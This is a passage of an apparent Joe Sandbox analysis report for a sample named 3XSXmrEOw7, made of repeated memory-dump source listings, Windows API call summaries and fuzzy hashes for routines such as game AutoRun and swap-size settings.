                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryHandleModule
                                                                                                                        • String ID: %s\AutoRun$%s\DirectX$%s\Support$1.0$EA Game$Electronic Arts
                                                                                                                        • API String ID: 1119135582-703046973
                                                                                                                        • Opcode ID: 5b90b398e6f57ffb548b6c37434c464d42cee5ee5af4ff8ab7da3a7af927fe98
                                                                                                                        • Instruction ID: 2134d4b6efddb0738bd5c58a3c99903547b8c6aa91fdd798fafc08fe3100bd3d
                                                                                                                        • Opcode Fuzzy Hash: 5b90b398e6f57ffb548b6c37434c464d42cee5ee5af4ff8ab7da3a7af927fe98
                                                                                                                        • Instruction Fuzzy Hash: 0A71C675209B40DFC325DF39D8949D7BBE9AF9A304B04486EE4AE83341DB347609CB69
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,00000000,00000001), ref: 0040A2E1
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A2EF
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2FB
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040A30A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$CloseDeleteNextSleep
                                                                                                                        • String ID: %s\%s$Exit runGameSpecificExe$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                        • API String ID: 46525011-3194912456
                                                                                                                        • Opcode ID: 91241e56bf934b546b699c49240fd400c8f83d3a6524b28ef0f915d6fe014c4e
                                                                                                                        • Instruction ID: 7511dff2b348f996f6420e377bb50597cd3438be433f07267ca9a05eeeba9e8e
                                                                                                                        • Opcode Fuzzy Hash: 91241e56bf934b546b699c49240fd400c8f83d3a6524b28ef0f915d6fe014c4e
                                                                                                                        • Instruction Fuzzy Hash: 6831D97114C3809BE724DF64CC55FDB73A8EFC4704F44492EB98953281DB79A609CB6A
                                                                                                                        APIs
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 0043BF6C
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 0043BF74
                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 0043BF81
                                                                                                                        • GetDC.USER32(00000000), ref: 0043BF90
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043BFA4
                                                                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 0043BFB0
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0043BFBB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                        • String ID: System
                                                                                                                        • API String ID: 46613423-3470857405
                                                                                                                        • Opcode ID: 34a5214d701ba711fae31cd4acf1fda7a807ca5a63d6224fd731787f2f7bba35
                                                                                                                        • Instruction ID: 481e154c11c6ec21bb8af5e6b4aac1b2a550fc1cfe250600bab0cbb86326bdff
                                                                                                                        • Opcode Fuzzy Hash: 34a5214d701ba711fae31cd4acf1fda7a807ca5a63d6224fd731787f2f7bba35
                                                                                                                        • Instruction Fuzzy Hash: A0118271A00218EBEB10ABA0DC45B9E7B78FF4A745F11502AF705A7180D7759D41CBA9
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 00429332
                                                                                                                        • __allrem.LIBCMT ref: 0042934A
                                                                                                                        • __allrem.LIBCMT ref: 00429366
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293A1
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293BD
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004293D4
                                                                                                                          • Part of subcall function 0042DE49: __lock.LIBCMT ref: 0042DE61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                                                                        • String ID: E
                                                                                                                        • API String ID: 4106114094-3568589458
                                                                                                                        • Opcode ID: 6e3fe257e22c206209be54e6460b1a012ee50f874f1aa7e20f641ca81388939d
                                                                                                                        • Instruction ID: 1f7421b91edd23947d41c505488e0d727590d15bd34b202d747290f0fbd76ec4
                                                                                                                        • Opcode Fuzzy Hash: 6e3fe257e22c206209be54e6460b1a012ee50f874f1aa7e20f641ca81388939d
                                                                                                                        • Instruction Fuzzy Hash: AF716F71F00229AFDF14EFA9DC81BAEB7B5BB48314F54816AE514E3281D378AE418B54
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?), ref: 00411158
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00411166
                                                                                                                        • LocalFree.KERNEL32(?,00000000,?,setSwapSize,00000000), ref: 00411184
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                        • String ID: %I64d$SOFTWARE\$SwapSize$setSwapSize
                                                                                                                        • API String ID: 1365068426-648712029
                                                                                                                        • Opcode ID: d1cf75ccfc781d7461786fe8e806264fada37e45de825a409030c8232c35aa3b
                                                                                                                        • Instruction ID: 68c570f812988241753bd2a04a9715a3b5369f07d8492d5d9d524d181d3e445a
                                                                                                                        • Opcode Fuzzy Hash: d1cf75ccfc781d7461786fe8e806264fada37e45de825a409030c8232c35aa3b
                                                                                                                        • Instruction Fuzzy Hash: 96412571208341ABD314CF28C811BBBB7E5FBC9704F108A1EFA9597290DB75A846C79A
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?), ref: 00410FA8
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00410FB6
                                                                                                                        • LocalFree.KERNEL32(?,00000000,?,setCacheSize,00000000), ref: 00410FD4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                        • String ID: %I64d$CacheSize$SOFTWARE\$setCacheSize
                                                                                                                        • API String ID: 1365068426-3604744950
                                                                                                                        • Opcode ID: 6f1e5c5ee282dcb0d7b05a2273a88bf7176ecc9ecce939ed33e8854e711dea49
                                                                                                                        • Instruction ID: 601950fcef0dd2d4f76d757b2b0c535ca4c20b87e929a9b96b2bb7084ee85d76
                                                                                                                        • Opcode Fuzzy Hash: 6f1e5c5ee282dcb0d7b05a2273a88bf7176ecc9ecce939ed33e8854e711dea49
                                                                                                                        • Instruction Fuzzy Hash: DF4127712083429BD324DF28C811BBBB7E5FBC9704F104A1EF99597280DBB5A846C79A
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeA.VERSION(?,?,?,?,774E4B00), ref: 00417983
                                                                                                                        • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?,774E4B00), ref: 004179C5
                                                                                                                        • VerQueryValueA.VERSION(00000000,\VarFileInfo\Translation,0047E5B0,?,?,?,00000000,00000000,?,774E4B00), ref: 004179E2
                                                                                                                        • wsprintfA.USER32 ref: 00417A16
                                                                                                                        • VerQueryValueA.VERSION(00000000,00000000,?,?,?,?,00000000,00000000,?,774E4B00), ref: 00417A27
                                                                                                                        Strings
                                                                                                                        • \VarFileInfo\Translation, xrefs: 004179DC
                                                                                                                        • \StringFileInfo\%04x%04x\FileVersion, xrefs: 00417A10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileInfoQueryValueVersion$Sizewsprintf
                                                                                                                        • String ID: \StringFileInfo\%04x%04x\FileVersion$\VarFileInfo\Translation
                                                                                                                        • API String ID: 2824581984-2452293203
                                                                                                                        • Opcode ID: 1d9a52a8851d63ee804a5414a862a7779f5d1fc8b53472c1e3fbd0a87d9fc535
                                                                                                                        • Instruction ID: 9c2dee7650dbba52f5ac2e6fe99141784f30488717657b5f3132d8fa3abcba4e
                                                                                                                        • Opcode Fuzzy Hash: 1d9a52a8851d63ee804a5414a862a7779f5d1fc8b53472c1e3fbd0a87d9fc535
                                                                                                                        • Instruction Fuzzy Hash: 5F41E3315482419FD321DA69D841EEFB7E89FD9344F04491EF88587201EA3CDA4A8BA6
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                          • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                          • Part of subcall function 00426C93: SetCurrentDirectoryA.KERNEL32(?,0044CC10,00000128,0040A5D1), ref: 00426CC2
                                                                                                                          • Part of subcall function 00426C93: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 00426CD8
                                                                                                                          • Part of subcall function 00426C93: GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                          • Part of subcall function 00426C93: SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                          • Part of subcall function 00426C93: GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                        • SystemParametersInfoA.USER32(00002000,00000000,?,00000000), ref: 0040A684
                                                                                                                        • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000003), ref: 0040A691
                                                                                                                        • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,0000000A), ref: 0040A6A5
                                                                                                                        • SystemParametersInfoA.USER32(00002000,00000000,?,00000003), ref: 0040A6BF
                                                                                                                        • Sleep.KERNEL32(000003E8,?,?,00000000,?,00000001,?,?,?), ref: 0040A6D5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryInfoParametersSystem$AddressEnvironmentErrorExecuteLastLibraryLoadProcShellSleepVariable
                                                                                                                        • String ID: %s\%s$open
                                                                                                                        • API String ID: 2525041801-538903891
                                                                                                                        • Opcode ID: 59a279b0954385b8510ba35d4019d76de19dcc7699603cd651c81ecb9936c81d
                                                                                                                        • Instruction ID: 2af7baaca54277b22fbb167bc7bcba665f60fb619d4bc69c6d1dc5b5fddf270f
                                                                                                                        • Opcode Fuzzy Hash: 59a279b0954385b8510ba35d4019d76de19dcc7699603cd651c81ecb9936c81d
                                                                                                                        • Instruction Fuzzy Hash: 5741C672184340ABE220DF54EC42FEBB7A8EB98B10F04092EB695571C1DB75A518C7AB
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0042CE0F
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,0044D548,00000000,?,00000000,00000000,00000000,00000000), ref: 0042CEDC
                                                                                                                        • WriteFile.KERNEL32(00000000), ref: 0042CEE3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
